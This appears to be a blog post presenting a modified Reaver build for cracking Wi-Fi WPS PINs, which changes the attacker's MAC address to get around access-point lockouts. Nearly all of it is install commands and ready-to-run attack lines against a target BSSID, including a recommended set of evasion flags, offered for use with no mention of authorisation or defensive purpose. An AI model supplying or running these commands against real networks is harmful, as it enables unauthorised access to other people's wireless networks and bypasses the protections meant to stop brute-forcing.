➖ REAVER WPS modified version with MAC Address last character changer to speed up the attack. ➖
▫ Well, some times the AP will reject the "EAPOL Request" after a success pin try. I made some tests with simultaneous reaver instances running with different MACs (the -m argument), and when one instance gets ▫
⚠ "WARNING: Receive timeout occurred", the other gets "Received identity request" and continue cracking
🔰 INSTALLATION 🔰
GIT CLONE - https://github.com/gabrielrcouto/reaver-wps
1.tar -xzvf reaver-1.4-mac-changer.tar.gz
**2.Install Required Libraries and Tools
3.sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
Build Reaver
4.cd reaver-1.4-mac-changer
5.cd src
6. ./configure
7.make
8.Install Reaver
9.sudo make install
➖ HOW TO USE: ➖
1. reaver -i mon0 -b AA:BB:CC:DD:EE:FF -M
or
2. reaver -i mon0 -b AA:BB:CC:DD:EE:FF --mac-changer
What I recommend:
3. reaver -i mon0 -b AA:BB:CC:DD:EE:FF --mac-changer --no-nacks --win7 --no-associate -vv
No comments:
Post a Comment